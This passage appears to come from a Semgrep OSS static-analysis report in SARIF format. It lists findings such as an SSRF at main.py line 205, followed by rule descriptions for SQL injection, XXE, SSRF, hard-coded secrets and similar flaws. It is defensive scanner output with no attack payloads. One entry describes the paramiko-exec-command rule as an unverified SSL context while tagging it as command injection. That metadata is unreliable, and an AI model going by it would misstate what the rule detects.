option."},"properties":{},"ruleId":"python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query"},{"fingerprints":{"matchBasedId/v1":"eb489f29c0f9f23fc57bf95d5ccc8c6943d1aadce9676bbffeeda70bced0d709afdf85aacd16defd99e631c1d754c8bc63017336907fc7732354fdf4e81e7446_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"main.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":37,"endLine":205,"snippet":{"text":" response = requests.get(url)"},"startColumn":20,"startLine":205}}}],"message":{"text":"Data from request object is passed to a new server-side request. This could lead to a server-side request forgery (SSRF). To mitigate, ensure that schemes and hosts are validated against an allowlist, do not forward the response to the user, and ensure proper authentication and transport-layer security in the proxied request."},"properties":{},"ruleId":"python.flask.security.injection.ssrf-requests.ssrf-requests"}],"tool":{"driver":{"name":"Semgrep OSS","rules":[{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret","id":"swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret","name":"swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Many different options exist to fix this issue depending the use case (Application can send request only to identified and trusted applications, Application can send requests to ANY external IP address or domain name)."},"help":{"markdown":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Many different options exist to fix this issue depending the use case (Application can send request only to identified and trusted applications, Application can send requests to ANY external IP address or domain name).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.ssrf.web-request.ssrf)\n - [https://cwe.mitre.org/data/definitions/918.html](https://cwe.mitre.org/data/definitions/918.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Many different options exist to fix this issue depending the use case (Application can send request only to identified and trusted applications, Application can send requests to ANY external IP address or domain name)."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.ssrf.web-request.ssrf","id":"csharp.lang.security.ssrf.web-request.ssrf","name":"csharp.lang.security.ssrf.web-request.ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.ssrf.web-request.ssrf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret","id":"swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret","name":"swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"External entities are allowed for $DBFACTORY. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://xml.org/sax/features/external-general-entities\" to false."},"help":{"markdown":"External entities are allowed for $DBFACTORY. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://xml.org/sax/features/external-general-entities\" to false.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://blog.sonarsource.com/secure-xml-processor](https://blog.sonarsource.com/secure-xml-processor)\n","text":"External entities are allowed for $DBFACTORY. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://xml.org/sax/features/external-general-entities\" to false."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true","id":"java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true","name":"java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"help":{"markdown":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly)\n - [https://owasp.org/www-community/HttpOnly](https://owasp.org/www-community/HttpOnly)\n","text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"helpUri":"https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly","id":"java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly","name":"java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"External XML Schema is allowed for identified XML parser. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks via XML Schema (`.xsd` files). It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"External XML Schema is allowed for identified XML parser. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks via XML Schema (`.xsd` files). It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"External XML Schema is allowed for identified XML parser. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks via XML Schema (`.xsd` files). It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema","id":"java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema","name":"java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'render text: ...' actually sets the content-type to 'text/html'. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Instead, use 'render plain: ...' to render non-HTML text."},"help":{"markdown":"'render text: ...' actually sets the content-type to 'text/html'. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Instead, use 'render plain: ...' to render non-HTML text.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text)\n - [https://brakemanpro.com/2017/09/08/cross-site-scripting-in-rails#inline-renders---even-worse-than-xss](https://brakemanpro.com/2017/09/08/cross-site-scripting-in-rails#inline-renders---even-worse-than-xss)\n","text":"'render text: ...' actually sets the content-type to 'text/html'. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Instead, use 'render plain: ...' to render non-HTML text."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text","id":"ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text","name":"ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host)\n - [https://goteleport.com/blog/ssrf-attacks/](https://goteleport.com/blog/ssrf-attacks/)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host","id":"go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host","name":"go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The alias in this location block is subject to a path traversal because the location path does not end in a path separator (e.g., '/'). To fix, add a path separator to the end of the path."},"help":{"markdown":"The alias in this location block is subject to a path traversal because the location path does not end in a path separator (e.g., '/'). To fix, add a path separator to the end of the path.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.alias-path-traversal.alias-path-traversal)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/)\n - [https://www.youtube.com/watch?v=CIhHpkybYsY](https://www.youtube.com/watch?v=CIhHpkybYsY)\n - [https://github.com/orangetw/My-Presentation-Slides/blob/main/data/2018-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out.pdf](https://github.com/orangetw/My-Presentation-Slides/blob/main/data/2018-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out.pdf)\n","text":"The alias in this location block is subject to a path traversal because the location path does not end in a path separator (e.g., '/'). To fix, add a path separator to the end of the path."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.alias-path-traversal.alias-path-traversal","id":"generic.nginx.security.alias-path-traversal.alias-path-traversal","name":"generic.nginx.security.alias-path-traversal.alias-path-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.alias-path-traversal.alias-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Warning MONGODB-CR was deprecated with the release of MongoDB 3.6 and is no longer supported by MongoDB 4.0 (see https://api.mongodb.com/python/current/examples/authentication.html for details)."},"help":{"markdown":"Warning MONGODB-CR was deprecated with the release of MongoDB 3.6 and is no longer supported by MongoDB 4.0 (see https://api.mongodb.com/python/current/examples/authentication.html for details).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pymongo.security.mongodb.mongo-client-bad-auth)\n - [https://cwe.mitre.org/data/definitions/477.html](https://cwe.mitre.org/data/definitions/477.html)\n","text":"Warning MONGODB-CR was deprecated with the release of MongoDB 3.6 and is no longer supported by MongoDB 4.0 (see https://api.mongodb.com/python/current/examples/authentication.html for details)."},"helpUri":"https://semgrep.dev/r/python.pymongo.security.mongodb.mongo-client-bad-auth","id":"python.pymongo.security.mongodb.mongo-client-bad-auth","name":"python.pymongo.security.mongodb.mongo-client-bad-auth","properties":{"precision":"very-high","tags":["CWE-477: Use of Obsolete Function","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.pymongo.security.mongodb.mongo-client-bad-auth"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context()' instead."},"help":{"markdown":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context()' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command)\n - [http://docs.paramiko.org/en/stable/api/client.html#paramiko.client.SSHClient.exec_command](http://docs.paramiko.org/en/stable/api/client.html#paramiko.client.SSHClient.exec_command)\n - [https://github.com/PyCQA/bandit/blob/d5f8fa0d89d7b11442fc6ec80ca42953974354c8/bandit/plugins/injection_paramiko.py](https://github.com/PyCQA/bandit/blob/d5f8fa0d89d7b11442fc6ec80ca42953974354c8/bandit/plugins/injection_paramiko.py)\n","text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context()' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command","id":"python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command","name":"python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an insufficient key size for RSA. NIST recommends a key size of 2048 or higher."},"help":{"markdown":"Detected an insufficient key size for RSA. NIST recommends a key size of 2048 or higher.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size)\n - [https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/](https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/)\n - [https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-57Pt3r1.pdf](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-57Pt3r1.pdf)\n","text":"Detected an insufficient key size for RSA. NIST recommends a key size of 2048 or higher."},"helpUri":"https://semgrep.dev/r/python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size","id":"python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size","name":"python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.knex-express.knex-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.knex-express.knex-express","id":"javascript.express.db.knex-express.knex-express","name":"javascript.express.db.knex-express.knex-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.knex-express.knex-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected XOR cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use AES instead."},"help":{"markdown":"Detected XOR cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use AES instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor)\n - [https://stackoverflow.com/questions/1135186/whats-wrong-with-xor-encryption](https://stackoverflow.com/questions/1135186/whats-wrong-with-xor-encryption)\n","text":"Detected XOR cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use AES instead."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor","id":"python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor","name":"python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"helpUri":"https://semgrep.dev/r/java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization","id":"java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization","name":"java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the use of exec(). exec() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. Ensure evaluated content is not definable by external sources."},"help":{"markdown":"Detected the use of exec(). exec() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. 